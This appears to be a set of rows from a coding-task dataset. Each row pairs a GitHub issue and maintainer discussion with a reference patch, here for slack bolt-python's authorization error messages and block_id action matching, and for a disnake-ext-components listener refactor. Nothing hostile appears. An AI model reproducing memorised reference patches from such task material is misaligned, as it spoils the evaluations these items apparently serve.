":warning: We apologize, but for some unknown reason, your installation with this app is no longer available. "
"Please reinstall this app into your workspace :bow:"
)
-def _build_error_response() -> BoltResponse:
+def _build_user_facing_error_response(message: str) -> BoltResponse:
# show an ephemeral message to the end-user
return BoltResponse(
status=200,
- body=_build_error_text(),
+ body=message,
)
diff --git a/slack_bolt/middleware/authorization/multi_teams_authorization.py b/slack_bolt/middleware/authorization/multi_teams_authorization.py
index 5d464d5e4..62972284b 100644
--- a/slack_bolt/middleware/authorization/multi_teams_authorization.py
+++ b/slack_bolt/middleware/authorization/multi_teams_authorization.py
@@ -8,10 +8,10 @@
from slack_bolt.response import BoltResponse
from .authorization import Authorization
from .internals import (
- _build_error_response,
+ _build_user_facing_error_response,
_is_no_auth_required,
_is_no_auth_test_call_required,
- _build_error_text,
+ _build_user_facing_authorize_error_message,
)
from ...authorization import AuthorizeResult
from ...authorization.authorize import Authorize
@@ -27,6 +27,7 @@ def __init__(
authorize: Authorize,
base_logger: Optional[Logger] = None,
user_token_resolution: str = "authed_user",
+ user_facing_authorize_error_message: Optional[str] = None,
):
"""Multi-workspace authorization.
@@ -34,10 +35,14 @@ def __init__(
authorize: The function to authorize incoming requests from Slack.
base_logger: The base logger
user_token_resolution: "authed_user" or "actor"
+ user_facing_authorize_error_message: The user-facing error message when installation is not found
"""
self.authorize = authorize
self.logger = get_bolt_logger(MultiTeamsAuthorization, base_logger=base_logger)
self.user_token_resolution = user_token_resolution
+ self.user_facing_authorize_error_message = (
+ user_facing_authorize_error_message or _build_user_facing_authorize_error_message()
+ )
def process(
self,
@@ -95,10 +100,10 @@ def process(
"the AuthorizeResult (returned value from authorize) for it was not found."
)
if req.context.response_url is not None:
- req.context.respond(_build_error_text())
+ req.context.respond(self.user_facing_authorize_error_message)
return BoltResponse(status=200, body="")
- return _build_error_response()
+ return _build_user_facing_error_response(self.user_facing_authorize_error_message)
except SlackApiError as e:
self.logger.error(f"Failed to authorize with the given token ({e})")
- return _build_error_response()
+ return _build_user_facing_error_response(self.user_facing_authorize_error_message)
diff --git a/slack_bolt/middleware/authorization/single_team_authorization.py b/slack_bolt/middleware/authorization/single_team_authorization.py
index 54cdff5c8..6fe62ed6a 100644
--- a/slack_bolt/middleware/authorization/single_team_authorization.py
+++ b/slack_bolt/middleware/authorization/single_team_authorization.py
@@ -8,11 +8,11 @@
from slack_sdk.errors import SlackApiError
from slack_sdk.web import SlackResponse
from .internals import (
- _build_error_response,
+ _build_user_facing_error_response,
_is_no_auth_required,
_to_authorize_result,
_is_no_auth_test_call_required,
- _build_error_text,
+ _build_user_facing_authorize_error_message,
)
from ...authorization import AuthorizeResult
@@ -23,6 +23,7 @@ def __init__(
*,
auth_test_result: Optional[SlackResponse] = None,
base_logger: Optional[Logger] = None,
+ user_facing_authorize_error_message: Optional[str] = None,
):
"""Single-workspace authorization.
@@ -32,6 +33,9 @@ def __init__(
"""
self.auth_test_result = auth_test_result
self.logger = get_bolt_logger(SingleTeamAuthorization, base_logger=base_logger)
+ self.user_facing_authorize_error_message = (
+ user_facing_authorize_error_message or _build_user_facing_authorize_error_message()
+ )
def process(
self,
@@ -73,9 +77,9 @@ def process(
# Just in case
self.logger.error("auth.test API call result is unexpectedly None")
if req.context.response_url is not None:
- req.context.respond(_build_error_text())
+ req.context.respond(self.user_facing_authorize_error_message)
return BoltResponse(status=200, body="")
- return _build_error_response()
+ return _build_user_facing_error_response(self.user_facing_authorize_error_message)
except SlackApiError as e:
self.logger.error(f"Failed to authorize with the given token ({e})")
- return _build_error_response()
+ return _build_user_facing_error_response(self.user_facing_authorize_error_message)
| Customize user-facing message sent when an installation is not managed by bolt-python app
Hello, I have a question regarding the message a user receives when they have not installed the app or completed the OAuth flow.
When a user clicks a button or executes a Slack command, they receive the following message:
`We apologize, but for some unknown reason, your installation with this app is no longer available. Please reinstall this app into your workspace`
My question: is there a way to not send this message to the user, or to send a custom message instead?
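The patch above answers this by adding an optional `user_facing_authorize_error_message` argument to the authorization middleware constructors. The fallback pattern it introduces can be sketched standalone in plain Python (hypothetical sketch class, not the real `slack_bolt` middleware):

```python
# Minimal sketch of the fallback introduced by the patch: a middleware accepts
# an optional user-facing message and falls back to the built-in default text
# when none is given. Class name is illustrative only.

DEFAULT_MESSAGE = (
    ":warning: We apologize, but for some unknown reason, your installation with this app "
    "is no longer available. Please reinstall this app into your workspace :bow:"
)


class SingleTeamAuthorizationSketch:
    def __init__(self, user_facing_authorize_error_message=None):
        # Same `or`-fallback as the patch: a custom message wins, else the default.
        self.user_facing_authorize_error_message = (
            user_facing_authorize_error_message or DEFAULT_MESSAGE
        )


default_mw = SingleTeamAuthorizationSketch()
custom_mw = SingleTeamAuthorizationSketch(
    user_facing_authorize_error_message="Please reinstall the app via /install."
)
print(default_mw.user_facing_authorize_error_message == DEFAULT_MESSAGE)  # True
print(custom_mw.user_facing_authorize_error_message)
```

In the real patch the same message is reused both for the ephemeral `respond(...)` call and for the `BoltResponse` body, so overriding the constructor argument changes every user-facing occurrence at once.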
| Hi @escc86, thanks for writing in. At this moment, there is no way to customize the message, but I agree this could be a valid feature request. I may enhance the built-in middleware in future releases: https://github.com/slackapi/bolt-python/blob/v1.18.1/slack_bolt/middleware/authorization/multi_teams_authorization.py#L90-L100
| 2024-05-08T03:55:21 | 0.0 | [] | [] |
||
slackapi/bolt-python | slackapi__bolt-python-990 | 970956bf1599c758f17527fc5591bc201824013b | diff --git a/slack_bolt/listener_matcher/builtins.py b/slack_bolt/listener_matcher/builtins.py
index e19a25121..c6547f919 100644
--- a/slack_bolt/listener_matcher/builtins.py
+++ b/slack_bolt/listener_matcher/builtins.py
@@ -292,7 +292,7 @@ def func(body: Dict[str, Any]) -> bool:
return workflow_step_edit(constraints["callback_id"], asyncio)
raise BoltError(f"type: {action_type} is unsupported")
- elif "action_id" in constraints:
+ elif "action_id" in constraints or "block_id" in constraints:
# The default value is "block_actions"
return block_action(constraints, asyncio)
@@ -313,8 +313,11 @@ def _block_action(
elif isinstance(constraints, dict):
# block_id matching is optional
block_id: Optional[Union[str, Pattern]] = constraints.get("block_id")
+ action_id: Optional[Union[str, Pattern]] = constraints.get("action_id")
+ if block_id is None and action_id is None:
+ return False
block_id_matched = block_id is None or _matches(block_id, action.get("block_id"))
- action_id_matched = _matches(constraints["action_id"], action["action_id"])
+ action_id_matched = action_id is None or _matches(action_id, action.get("action_id"))
return block_id_matched and action_id_matched
| app.action listener should accept block_id-only constraints for bolt-js feature parity
(Filling out the following details about bugs will help us solve your issue sooner.)
### Reproducible in:
```bash
pip freeze | grep slack
python --version
sw_vers && uname -v # or `ver`
```
#### The `slack_bolt` version
```
$ .venv/bin/pip freeze | grep slack
slack-bolt==1.18.0
slack-sdk==3.24.0
```
#### Python runtime version
```
$ .venv/bin/python --version
Python 3.9.16
```
#### OS info
(`sw_vers` is not valid in RHEL-related OSes)
```
$ cat /etc/redhat-release && uname -v
AlmaLinux release 9.2 (Turquoise Kodkod)
#1 SMP PREEMPT_DYNAMIC Tue Sep 12 09:28:32 EDT 2023
```
#### Steps to reproduce:
```python
@app.action( { 'type': 'block_action', 'block_id': 'response' } )
def handle_response_action(ack, client, body):
pass
```
### Expected result:
Per the documentation...
> You can use a constraints object to listen to `block_id`s and `action_id`s (or any combination of them).
Therefore, I expected to have an action handler that responded to any action from a block with id `response`.
### Actual result:
```
Failed to run a middleware (error: 'action_id')
Traceback (most recent call last):
File "/home/darkfox/git/codeberg/darkfoxprime/FreeportTrawler/.venv/lib64/python3.9/site-packages/slack_bolt/app/app.py", line 534, in dispatch
if listener.matches(req=req, resp=resp):
File "/home/darkfox/git/codeberg/darkfoxprime/FreeportTrawler/.venv/lib64/python3.9/site-packages/slack_bolt/listener/listener.py", line 25, in matches
is_matched = matcher.matches(req, resp)
File "/home/darkfox/git/codeberg/darkfoxprime/FreeportTrawler/.venv/lib64/python3.9/site-packages/slack_bolt/listener_matcher/builtins.py", line 54, in matches
return self.func(
File "/home/darkfox/git/codeberg/darkfoxprime/FreeportTrawler/.venv/lib64/python3.9/site-packages/slack_bolt/listener_matcher/builtins.py", line 327, in func
return _block_action(constraints, body)
File "/home/darkfox/git/codeberg/darkfoxprime/FreeportTrawler/.venv/lib64/python3.9/site-packages/slack_bolt/listener_matcher/builtins.py", line 317, in _block_action
action_id_matched = _matches(constraints["action_id"], action["action_id"])
KeyError: 'action_id'
```
## Requirements
Please read the [Contributing guidelines](https://github.com/slackapi/bolt-python/blob/main/.github/contributing.md) and [Code of Conduct](https://slackhq.github.io/code-of-conduct) before creating this issue or pull request. By submitting, you are agreeing to those rules.
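The fix in the patch above makes both `block_id` and `action_id` optional in the constraints dict, requiring only that at least one is present. That matcher logic can be sketched as a standalone simplified version of `_block_action` (not the real bolt-python internals):

```python
import re


def _matches(pattern, value):
    # Plain strings must match exactly; compiled regexes use fullmatch.
    if value is None:
        return False
    if isinstance(pattern, re.Pattern):
        return pattern.fullmatch(value) is not None
    return pattern == value


def block_action_matches(constraints: dict, body: dict) -> bool:
    # A block_actions payload carries the triggering element in actions[0].
    action = body.get("actions", [{}])[0]
    block_id = constraints.get("block_id")
    action_id = constraints.get("action_id")
    if block_id is None and action_id is None:
        return False  # a constraints dict with neither key matches nothing
    block_id_matched = block_id is None or _matches(block_id, action.get("block_id"))
    action_id_matched = action_id is None or _matches(action_id, action.get("action_id"))
    return block_id_matched and action_id_matched


body = {"actions": [{"block_id": "response", "action_id": "generated-123"}]}
print(block_action_matches({"block_id": "response"}, body))        # True
print(block_action_matches({"action_id": "generated-123"}, body))  # True
print(block_action_matches({"block_id": "other"}, body))           # False
```

This is exactly the reporter's scenario: dynamically generated `action_id`s inside a block with a known `block_id` can now be caught with `{"block_id": "response"}` alone, and the previous `KeyError: 'action_id'` path is gone because `action_id` is read with `.get()`.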
| Hi @darkfoxprime, thanks for taking the time to share this feedback! Indeed, the document should clearly mention this. We will improve it later on.
Since a block_actions event can occur per block element with an action_id, this is by design. Thus, please set a unique action_id for each interactive block element in your blocks.
> Hi @darkfoxprime, thanks for taking the time to share this feedback! Indeed, the document should clearly mention this. We will improve it later on.
>
> Since a block_actions event can occur per a block element w/ action_id, thie is by design. Thus, please set a unique action_id for each interactive block element in your blocks.
The requirement for a "unique" `action_id` is exactly why I want to be able to add an action handler on the `block_id` instead. My app uses dynamically-generated sets of actions, so it's impossible for me to be able to specify action ids for responding to them. However, they all are contained within blocks with known block ids, so being able to use `@app.action( { 'block_id': '...' } )` with no `action_id` would greatly simplify this work.
For this particular scenario, we currently recommend appending a prefix to the auto-generated action_id string values. Then pass a regexp that matches the prefix to an `app.action` listener.
If we receive more requests like this in the future (actually, this is the first time we've learned of this need), we may consider enhancing the dictionary constraint to support having only a block_id. However, I have to say that it's not our team's primary focus at this moment. It'd be appreciated if you could understand this.
In that case, please fix the documentation so that it clearly states that the `action_id` is required in the constraints.
Hi @darkfoxprime, I am so sorry that I was wrong here. The document is in alignment with bolt-js, and the behavior of bolt-js is like you expect. Therefore, I must retract my above statement. We will improve bolt-python's behavior to be consistent with bolt-js. Though I'm presently occupied with a different task, I'm confident that I can make a new patch release including the fix for this issue within the next few business days.
| 2023-11-21T06:51:46 | 0.0 | [] | [] |
||
DisnakeCommunity/disnake-ext-components | DisnakeCommunity__disnake-ext-components-5 | a42ddc7ee5d168c6352cb0f97d4d80365760ccab | diff --git a/.flake8 b/.flake8
index e1675c9..eeb9251 100644
--- a/.flake8
+++ b/.flake8
@@ -6,8 +6,9 @@ max-line-length = 110
per-file-ignores =
**/__init__.py: F401, F403
- # Give examples the space they need
+ # Give examples and tests the space they need
examples/*.py: E501
+ tests/*.py: E501
accept-encodings = utf-8
docstring-convention = numpy
\ No newline at end of file
diff --git a/.gitignore b/.gitignore
index d8c0081..e048841 100644
--- a/.gitignore
+++ b/.gitignore
@@ -6,5 +6,6 @@ __pycache__
test.py
*.ipynb
+tests/_*.py
coverage.*
.coverage
\ No newline at end of file
diff --git a/disnake_ext_components/abc.py b/disnake_ext_components/abc.py
index 7960be9..f51a9b8 100644
--- a/disnake_ext_components/abc.py
+++ b/disnake_ext_components/abc.py
@@ -1,10 +1,11 @@
import abc
+import asyncio.coroutines
import sys
import typing as t
-import disnake
+from disnake.ext import commands
-from . import params, types_
+from . import params, types_, utils
if sys.version_info >= (3, 10):
from typing import ParamSpec
@@ -16,18 +17,34 @@
T = t.TypeVar("T")
ParentT = t.TypeVar("ParentT")
P = ParamSpec("P")
-InteractionT = t.TypeVar("InteractionT", bound=disnake.Interaction)
ListenerT = t.TypeVar("ListenerT", bound="BaseListener[t.Any, t.Any, t.Any]")
-class BaseListener(types_.partial[t.Awaitable[T]], abc.ABC, t.Generic[P, T, InteractionT]):
+class BaseListener(abc.ABC, t.Generic[P, T, types_.InteractionT]):
- # These are just to conform to dpy listener spec
- __name__: str
+ # Make asyncio.iscoroutinefunction believe this is a coroutine function...
+ _is_coroutine = asyncio.coroutines._is_coroutine # type: ignore
+
+ # These are just to conform to dpy listener spec...
__cog_listener__: t.Final[t.Literal[True]] = True
__cog_listener_names__: t.List[types_.ListenerType]
+ parent: t.Optional[t.Any]
+ """The class on which this listener is defined, if any.
+ Used to set the `self` parameter on the listener.
+ """
+
+ callback: t.Callable[..., types_.Coro[T]]
+ """The callback function wrapped by this listener."""
+
+ name: t.Optional[str]
+ """The name is used to determine the custom id spec for the listener.
+ This can be customized in `~.__init__`. For most listeners, the name will equal the name of
+ the bound callback function.
+ If no name is provided, custom_id name validation will will be skipped.
+ """
+
id_spec: str
"""The spec that inbound `custom_id`s should match. Also used to create new custom ids; see
`~.build_custom_id`.
@@ -49,26 +66,53 @@ class BaseListener(types_.partial[t.Awaitable[T]], abc.ABC, t.Generic[P, T, Inte
about their regex pattern(s) and converter(s).
"""
- def __new__(
- cls: t.Type[ListenerT],
- func: t.Callable[..., t.Awaitable[T]],
- **kwargs: t.Any,
- ) -> ListenerT:
- self = super().__new__(cls, func)
- self.__name__ = func.__name__
- return self
+ checks: t.List[types_.CheckCallback[types_.InteractionT]]
+ """Check functions that are called when the listener is invoked. All of these must pass for
+ the listener invocation to complete.
+ """
- def __get__(self: ListenerT, instance: t.Any, _) -> ListenerT:
+ def __init__(
+ self,
+ callback: t.Callable[..., types_.Coro[T]],
+ *,
+ name: t.Optional[str] = None,
+ regex: t.Union[str, t.Pattern[str], None] = None,
+ sep: str = ":",
+ ) -> None:
+ self.checks = []
+ self.parent = None
+
+ self.callback = callback
+ self.name = name
+ self.__name__ = callback.__name__
+ self._signature = commands.params.signature(callback) # type: ignore
+
+ if regex:
+ self.regex = utils.ensure_compiled(regex)
+ self.id_spec = utils.id_spec_from_regex(self.regex)
+ self.sep = None
+
+ else:
+ self.regex = None
+ self.id_spec = utils.id_spec_from_signature(self.name or "", sep, self._signature)
+ self.sep = sep
+
+ def __get__(self: ListenerT, instance: t.Optional[t.Any], _) -> ListenerT:
"""Abuse descriptor functionality to inject instance of the owner class as first arg."""
# Inject instance of the owner class as the partial's first arg.
# If need be, we could add support for classmethods by checking the
# type of self.func and injecting the owner class instead where appropriate.
- self.__setstate__((self.func, (instance,), {}, self.__dict__)) # type: ignore
+ self.parent = instance
return self
+ async def __call__(self, *args: t.Any, **kwargs: t.Any) -> T:
+ if self.parent:
+ return await self.callback(self.parent, *args, **kwargs)
+ return await self.callback(*args, **kwargs)
+
def error(
- self, func: t.Callable[[ParentT, InteractionT, Exception], t.Any]
- ) -> t.Callable[[ParentT, InteractionT, Exception], t.Any]:
+ self, func: t.Callable[[ParentT, types_.InteractionT, Exception], t.Any]
+ ) -> t.Callable[[ParentT, types_.InteractionT, Exception], t.Any]:
"""Register an error handler for this listener.
Note: Not yet implemented.
"""
@@ -100,7 +144,9 @@ def parse_custom_id(self, custom_id: str) -> t.Tuple[str, ...]:
return tuple(params.values())
name, *params = custom_id.split(self.sep)
- if name != self.__name__ or len(params) != len(self.params):
+ # If no name is set, skip name check. Otherwise, assure stored and provided name are equal.
+ # Also confirm the number of incoming params matches the number of params on the listener.
+ if (self.name and name != self.name) or (len(params) != len(self.params)):
raise ValueError(f"Listener spec {self.id_spec} did not match custom_id {custom_id}.")
return tuple(params)
@@ -110,7 +156,8 @@ async def build_custom_id(self, *args: P.args, **kwargs: P.kwargs) -> str:
the values entered are valid according to the listener's typehints, the custom_id is
guaranteed to be matched by the listener.
- Note: No actual validation is done on the values entered.
+ Note: No actual validation is done on the values entered, though they are converted where
+ possible.
Parameters
----------
@@ -139,11 +186,35 @@ async def build_custom_id(self, *args: P.args, **kwargs: P.kwargs) -> str:
kwargs.update(args_as_kwargs) # This is safe as we ensured there is no overlap.
- # "Serialize" types to str...
- deserialized_kwargs = {
- param.name: await param.to_str(kwargs[param.name]) for param in self.params
+ # "Serialize" types to strings; empty string for None (optional)...
+ serialized_kwargs = {
+ param.name: "" if kwargs[param.name] is None else await param.to_str(kwargs[param.name])
+ for param in self.params
}
if self.regex:
- return self.id_spec.format(**deserialized_kwargs)
- return self.id_spec.format(sep=self.sep, **deserialized_kwargs)
+ custom_id = self.id_spec.format(**serialized_kwargs)
+ custom_id = self.id_spec.format(sep=self.sep, **serialized_kwargs)
+
+ if not custom_id: # Fallback in case the listener has neither a name nor params.
+ return self.__name__
+ return custom_id
+
+ def add_check(self, callback: types_.CheckT) -> types_.CheckT:
+ """Add a check to the listener. Like `commands.check` checks, these checks must
+ take an interaction as their sole parameter and must return a boolean. Checks may
+ be coroutines, though this is not required. Checks are run when the listener is
+ called by an interaction event, and are bypassed when the listener is called manually.
+ All checks must pass for the interaction to go through and fire the listener callback.
+
+ Parameters
+ ----------
+ check: t.Callable[[:class:`disnake.Interaction`], MaybeCoro[:class:`bool`]]
+ The check to be added.
+
+ Returns:
+ t.Callable[[:class:`disnake.Interaction`], MaybeCoro[:class:`bool`]]
+ The callback of the check is returned unedited such that it can be used elsewhere.
+ """
+ self.checks.append(callback)
+ return callback
diff --git a/disnake_ext_components/converter.py b/disnake_ext_components/converter.py
index 32d36e0..255f1e7 100644
--- a/disnake_ext_components/converter.py
+++ b/disnake_ext_components/converter.py
@@ -6,12 +6,14 @@
import disnake
from disnake.ext import commands
+from . import types_
+
__all__ = ["ALLOW_CONVERTER_FETCHING", "CONVERTER_MAP"]
CollectionT = t.TypeVar("CollectionT", bound=t.Collection[t.Any])
ConverterSig = t.Union[
- t.Callable[..., t.Awaitable[t.Any]],
+ t.Callable[..., types_.Coro[t.Any]],
t.Callable[..., t.Any],
]
ChannelT = t.TypeVar("ChannelT", disnake.abc.GuildChannel, disnake.Thread)
@@ -39,7 +41,7 @@ class ALLOW_CONVERTER_FETCHING: # There's probably a better way of doing this..
def collection_converter(
collection_type: t.Type[CollectionT],
inner_converter: ConverterSig,
-) -> t.Callable[[t.Collection[str], disnake.Interaction, t.List[t.Any]], t.Awaitable[CollectionT]]:
+) -> t.Callable[[t.Collection[str], disnake.Interaction, t.List[t.Any]], types_.Coro[CollectionT]]:
"""Create a converter for a given collection type."""
async def _convert_collection(
@@ -60,7 +62,7 @@ async def _convert_collection(
return _convert_collection
-def make_channel_converter(type_: t.Type[ChannelT]) -> t.Callable[..., t.Awaitable[ChannelT]]:
+def make_channel_converter(type_: t.Type[ChannelT]) -> t.Callable[..., types_.Coro[ChannelT]]:
"""Create a channel converter for a given channel type."""
async def _convert_channel(argument: str, inter: disnake.Interaction) -> ChannelT:
@@ -289,7 +291,7 @@ def make_flag_converter(type_: t.Type[FlagT]) -> t.Callable[..., FlagT]:
"""Create a flag converter for a given flag type."""
def _convert_flag(argument: str, inter: disnake.Interaction) -> FlagT:
- return type_._from_value(int(argument))
+ return type_._from_value(int(argument)) # pyright: ignore[reportUnknownMemberType]
return _convert_flag
diff --git a/disnake_ext_components/deprecation.py b/disnake_ext_components/deprecation.py
new file mode 100644
index 0000000..13d3ab1
--- /dev/null
+++ b/disnake_ext_components/deprecation.py
@@ -0,0 +1,52 @@
+# Thanks to genshin.py for this
+
+import functools
+import inspect
+import typing
+import warnings
+
+__all__ = ["deprecated", "warn_deprecated"]
+
+CallableT = typing.TypeVar("CallableT", bound=typing.Callable[..., typing.Any])
+
+
+def warn_deprecated(
+ obj: typing.Any,
+ *,
+ alternative: typing.Optional[str] = None,
+ stack_level: int = 3,
+) -> None:
+ """Raise a deprecation warning."""
+ if inspect.isclass(obj) or inspect.isfunction(obj):
+ obj = f"{obj.__qualname__}"
+
+ message = f"{obj} is deprecated and will be removed in the following version."
+
+ if alternative is not None:
+ message += f" You can use '{alternative}' instead."
+
+ warnings.warn(message, category=DeprecationWarning, stacklevel=stack_level)
+
+
+def deprecated(alternative: typing.Optional[str] = None) -> typing.Callable[[CallableT], CallableT]:
+ """Mark a function as deprecated."""
+
+ def decorator(obj: CallableT) -> CallableT:
+ alternative_str = f"You can use `{alternative}` instead.\n" if alternative else ""
+
+ doc = (
+ "!!! warning\n"
+ f" This function is deprecated and will be removed in an upcoming version.\n"
+ f" {alternative_str}"
+ "\n\n"
+ ) + (inspect.getdoc(obj) or "")
+ obj.__doc__ = doc
+
+ @functools.wraps(obj)
+ def wrapper(*args: typing.Any, **kwargs: typing.Any) -> typing.Any:
+ warn_deprecated(obj, alternative=alternative, stack_level=3)
+ return obj(*args, **kwargs)
+
+ return typing.cast("CallableT", wrapper)
+
+ return decorator
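The `deprecation.py` module added above is self-contained stdlib code. A minimal usage sketch (decorator reproduced as in the patch; the example function name is made up):

```python
import functools
import inspect
import warnings


def warn_deprecated(obj, *, alternative=None, stack_level=3):
    if inspect.isclass(obj) or inspect.isfunction(obj):
        obj = f"{obj.__qualname__}"
    message = f"{obj} is deprecated and will be removed in the following version."
    if alternative is not None:
        message += f" You can use '{alternative}' instead."
    warnings.warn(message, category=DeprecationWarning, stacklevel=stack_level)


def deprecated(alternative=None):
    def decorator(obj):
        @functools.wraps(obj)
        def wrapper(*args, **kwargs):
            warn_deprecated(obj, alternative=alternative, stack_level=3)
            return obj(*args, **kwargs)
        return wrapper
    return decorator


@deprecated(alternative="new_listener")
def old_listener():
    return 42


with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")
    result = old_listener()

print(result)                                    # 42
print(caught[0].category is DeprecationWarning)  # True
```

The wrapped function still runs normally; the decorator only emits a `DeprecationWarning` on each call (and, in the full patch, also prepends a warning admonition to the docstring).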
diff --git a/disnake_ext_components/listener.py b/disnake_ext_components/listener.py
index 7d4dd25..adb68e8 100644
--- a/disnake_ext_components/listener.py
+++ b/disnake_ext_components/listener.py
@@ -1,12 +1,13 @@
from __future__ import annotations
+import inspect
import sys
import typing as t
import disnake
from disnake.ext import commands
-from . import abc, params, types_, utils
+from . import abc, deprecation, params, types_, utils
__all__ = [
"button_listener",
@@ -15,6 +16,7 @@
"SelectListener",
"modal_listener",
"ModalListener",
+ "match_component",
]
@@ -32,37 +34,54 @@
ListenerT = t.TypeVar("ListenerT", bound="abc.BaseListener[t.Any, t.Any, t.Any]")
-InteractionT = t.TypeVar("InteractionT", disnake.MessageInteraction, disnake.ModalInteraction)
-ErrorHandlerT = t.Callable[[ParentT, InteractionT, Exception], t.Any]
+ComponentListener = t.Union[
+ "ButtonListener[t.Any, t.Any]",
+ "SelectListener[t.Any, t.Any]",
+]
+
+ButtonReference = t.Union[
+ disnake.Button,
+ disnake.ui.Button[t.Any],
+ types_.AbstractComponent,
+]
+SelectReference = t.Union[
+ disnake.SelectMenu,
+ disnake.ui.Select[t.Any],
+ types_.AbstractComponent,
+]
-# TODO: Make this more compact.
+# fmt: off
ButtonListenerCallback = t.Union[
- t.Callable[Concatenate[ParentT, disnake.MessageInteraction, P], t.Awaitable[T]],
- t.Callable[Concatenate[disnake.MessageInteraction, P], t.Awaitable[T]],
+ t.Callable[Concatenate[ParentT, disnake.MessageInteraction, P], types_.Coro[T]],
+ t.Callable[Concatenate[disnake.MessageInteraction, P], types_.Coro[T]],
]
SelectListenerCallback = t.Union[
- t.Callable[Concatenate[ParentT, disnake.MessageInteraction, t.Any, P], t.Awaitable[T]],
- t.Callable[Concatenate[disnake.MessageInteraction, t.Any, P], t.Awaitable[T]],
+ t.Callable[Concatenate[ParentT, disnake.MessageInteraction, P], types_.Coro[T]],
+ t.Callable[Concatenate[ParentT, disnake.MessageInteraction, t.Any, P], types_.Coro[T]],
+
+ t.Callable[Concatenate[disnake.MessageInteraction, P], types_.Coro[T]],
+ t.Callable[Concatenate[disnake.MessageInteraction, t.Any, P], types_.Coro[T]],
]
-# flake8: noqa: E241
+# flake8: noqa: E501
ModalListenerCallback = t.Union[
- # fmt: off
- t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, P], t.Awaitable[T]],
- t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, t.Any, P], t.Awaitable[T]],
- t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, t.Any, t.Any, P], t.Awaitable[T]],
- t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, t.Any, t.Any, t.Any, P], t.Awaitable[T]],
- t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, t.Any, t.Any, t.Any, t.Any, P], t.Awaitable[T]],
-
- t.Callable[Concatenate[disnake.ModalInteraction, t.Any, P], t.Awaitable[T]],
- t.Callable[Concatenate[disnake.ModalInteraction, t.Any, t.Any, P], t.Awaitable[T]],
- t.Callable[Concatenate[disnake.ModalInteraction, t.Any, t.Any, t.Any, P], t.Awaitable[T]],
- t.Callable[Concatenate[disnake.ModalInteraction, t.Any, t.Any, t.Any, t.Any, P], t.Awaitable[T]],
- t.Callable[Concatenate[disnake.ModalInteraction, t.Any, t.Any, t.Any, t.Any, t.Any, P], t.Awaitable[T]],
- # fmt: on
+ t.Callable[Concatenate[ParentT, disnake.ModalInteraction, P], types_.Coro[T]],
+ t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, P], types_.Coro[T]],
+ t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, t.Any, P], types_.Coro[T]],
+ t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, t.Any, t.Any, P], types_.Coro[T]],
+ t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, t.Any, t.Any, t.Any, P], types_.Coro[T]],
+ t.Callable[Concatenate[ParentT, disnake.ModalInteraction, t.Any, t.Any, t.Any, t.Any, t.Any, P], types_.Coro[T]],
+
+ t.Callable[Concatenate[disnake.ModalInteraction, P], types_.Coro[T]],
+ t.Callable[Concatenate[disnake.ModalInteraction, t.Any, P], types_.Coro[T]],
+ t.Callable[Concatenate[disnake.ModalInteraction, t.Any, t.Any, P], types_.Coro[T]],
+ t.Callable[Concatenate[disnake.ModalInteraction, t.Any, t.Any, t.Any, P], types_.Coro[T]],
+ t.Callable[Concatenate[disnake.ModalInteraction, t.Any, t.Any, t.Any, t.Any, P], types_.Coro[T]],
+ t.Callable[Concatenate[disnake.ModalInteraction, t.Any, t.Any, t.Any, t.Any, t.Any, P], types_.Coro[T]],
]
+# fmt: on
class ButtonListener(abc.BaseListener[P, T, disnake.MessageInteraction]):
@@ -89,33 +108,25 @@ class ButtonListener(abc.BaseListener[P, T, disnake.MessageInteraction]):
Under normal circumstances, this should not lead to conflicts. In case ':' is intentionally
part of the `custom_id`s matched by the listener, this should be set to a different value
to prevent conflicts.
+    reference: Optional[Union[:class:`disnake.Button`, :class:`disnake.ui.Button`, :class:`AbstractComponent`]]
+ A reference component used to set default values in `~.build_component`.
"""
__cog_listener_names__: t.List[types_.ListenerType] = [types_.ListenerType.BUTTON]
- def __new__(
- cls: t.Type[ListenerT],
- func: ButtonListenerCallback[ParentT, P, T],
- **kwargs: t.Any,
- ) -> ListenerT:
- return super().__new__(cls, func, **kwargs)
+ reference: types_.AbstractComponent
+ """A reference component used to set default values in `~.build_component`."""
def __init__(
self,
- func: ButtonListenerCallback[ParentT, P, T],
+ callback: ButtonListenerCallback[ParentT, P, T],
*,
+ name: t.Optional[str] = None,
regex: t.Union[str, t.Pattern[str], None] = None,
sep: str = ":",
+ reference: t.Optional[ButtonReference] = None,
) -> None:
- self._signature = commands.params.signature(func) # pyright: ignore
- if regex:
- self.regex = utils.ensure_compiled(regex)
- self.id_spec = utils.id_spec_from_regex(self.regex)
- self.sep = None
- else:
- self.regex = None
- self.id_spec = utils.id_spec_from_signature(self.__name__, sep, self._signature)
- self.sep = sep
+ super().__init__(callback, name=name, regex=regex, sep=sep)
special_params, listener_params = utils.extract_listener_params(self._signature)
@@ -126,6 +137,19 @@ def __init__(
)
self.params = [params.ParamInfo.from_param(param) for param in listener_params]
+ self.reference = self._choose_optimal_reference(reference)
+
+ def _choose_optimal_reference(
+ self,
+ component: t.Optional[ButtonReference],
+ ) -> types_.AbstractComponent:
+ if component is not None: # Manually provided takes highest priority
+ if isinstance(component, types_.AbstractComponent):
+ return component
+ return types_.AbstractComponent.from_component(component)
+
+ # Nothing of use was found, return an AbstractComponent that can match any button.
+ return types_.AbstractComponent(type=disnake.ComponentType.button)
async def __call__( # pyright: ignore
self,
@@ -166,6 +190,9 @@ async def __call__( # pyright: ignore
except ValueError:
return
+ if not await utils.assert_all_checks(self.checks, inter):
+ return
+
converted: t.Dict[str, t.Any] = {}
for param, arg in zip(self.params, custom_id_params):
converted[param.name] = await param.convert(
@@ -177,6 +204,26 @@ async def __call__( # pyright: ignore
return await super().__call__(inter, **converted)
+ async def build_component(
+ self,
+ style: t.Optional[disnake.ButtonStyle] = None,
+ label: t.Optional[str] = None,
+ disabled: t.Optional[bool] = None,
+ url: t.Optional[str] = None,
+ emoji: t.Union[str, disnake.Emoji, disnake.PartialEmoji, None] = None,
+ *args: P.args,
+ **kwargs: P.kwargs,
+ ) -> disnake.ui.Button[t.Any]:
